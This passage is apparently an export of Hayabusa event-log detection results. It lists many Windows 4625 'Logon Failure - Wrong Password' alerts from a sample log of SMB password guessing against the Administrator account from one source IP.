NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.801 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ALrDwJz2cta9fcXB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.841 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZZNXGw28osMQLjub | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.882 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4wQzvMnwYuEQRO7V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.917 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UloOAIgGuj6NecfR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:12.960 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cVSeLo2PRgGmf83Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.004 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SaCFO8CPFLuERugV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.042 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QCwV1D4L5BDZSriK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.090 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QPhLQsM4R2ua4SxW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.136 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fwgp52JNi7xnTxpN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.184 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j2GutBDenjweAluz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.250 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wflcgg5ebqu8hHGL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.292 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jXaaYSU2pakw6IsK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.344 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BfJnBv3eA8wZttML | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.393 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kOXSI0jPfbvW4dAg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.428 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8JW6aX5mNz7cETsl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.478 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NVuJLXJzlVnDLT4Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.528 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WtSwhwnApnPI9AkO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.568 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1peOkjbd1WXGEAAM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.616 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Tbw3V9MtLIcxr65R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.648 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CEZ2v1f6t0luDj4D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.689 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R0omMppAFlFhE1mG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.734 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0jMvVN9eSeGW3zcN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.782 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HnFNYabbO7IpbVku | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.816 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8KtyTTNdqVikZGYY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.864 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DCChjnFv2hMXXwgW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.918 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FvIYRZSomaJYJOH5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:13.965 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FEirUFRscaOwTuAg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:14.005 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RwQgMM9H1oN4te9Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:14.056 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JbGILYTcFwtYbDk1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:14.168 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p5KzNsgWvyUhNEHd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:14.213 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KGvwbOtP3A5eDKCZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:14.261 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YZvtNNX511hIleST | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:14.299 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lJBRTeW6OQtNrt5u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:14.348 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hovgq99STVt2GzrO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:14.380 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4kpT3gf0VCAVuVSa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:14.428 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tiB04AvkYp0PP3n1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:14.479 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PPluKgaiT10oC35V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:14.527 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8nCOM9uUeqv9QBx6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:14.574 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dSPrrNCh2FSWZKbI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:14.621 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aLDnCjr4pSdKAMX7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:14.673 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G0UnmfB7lcXKEAvn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:14.722 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ogjMSxcUw7cF5dMa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:14.773 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 75uB8ejsSV5CbagM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:14.814 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5MMHLnyrzBQxluHn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:14.862 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5QXLn6fpmR52RBAz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:14.908 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KcdlrSUzcFNpaK5v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:14.944 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VJjiRO5rJzZ8XtqP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:14.986 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ncBraDdG2htkHjXU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.033 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Lo9DNrL44Z2S2SYR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.075 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QKcFiKC5QiIoHtxy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.120 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sqvq9GwuPCO15lUV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.164 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4XzgtJ3qUmkFiIY5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.215 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V1wc1Hjb4AK0Np1q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.253 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PKYNy0JyxIlFusMC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.298 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IrcKp13ut9M0pCi0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.341 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B3lJSH0r8iHAVhPF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.392 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ju3lCbvbwvkIKsBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.435 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dQOHcZeAKQG6wHhC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.474 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QBPkgoKDLABqdSQb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.524 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wqj4xOCsJg1j3IIh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.561 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XhBIu6wUPHc3DZAy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.604 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W0fI1GhH5YTOHbNN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.652 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7mLOWiojillZNYH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.702 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 37dknpwsl8j1WRWi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.748 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gzVum7a21sQe3fMt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.788 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JCFPSQmywelTXg74 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.832 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jCqb6TVV14hVX3NY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.888 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3qJsJrxVARedOdd3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.936 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s7iNkrkBNEbXPK0B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:15.975 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bio4zciNRolyeHc1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.026 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IFf1vN5MgAIsdZvx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.072 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zWhgUQSWAycVdYoS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.116 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ugHUJZuKHYfUHXWS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.168 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AUeUmYa72BzHfyhK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.212 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ksydur7W1mUoOZAE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.261 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YNIzopnsXH6OjcUs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.296 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SQljJkaWs8bcaOI1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.344 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1jejn6ZMo564m7ok | IP Addr: 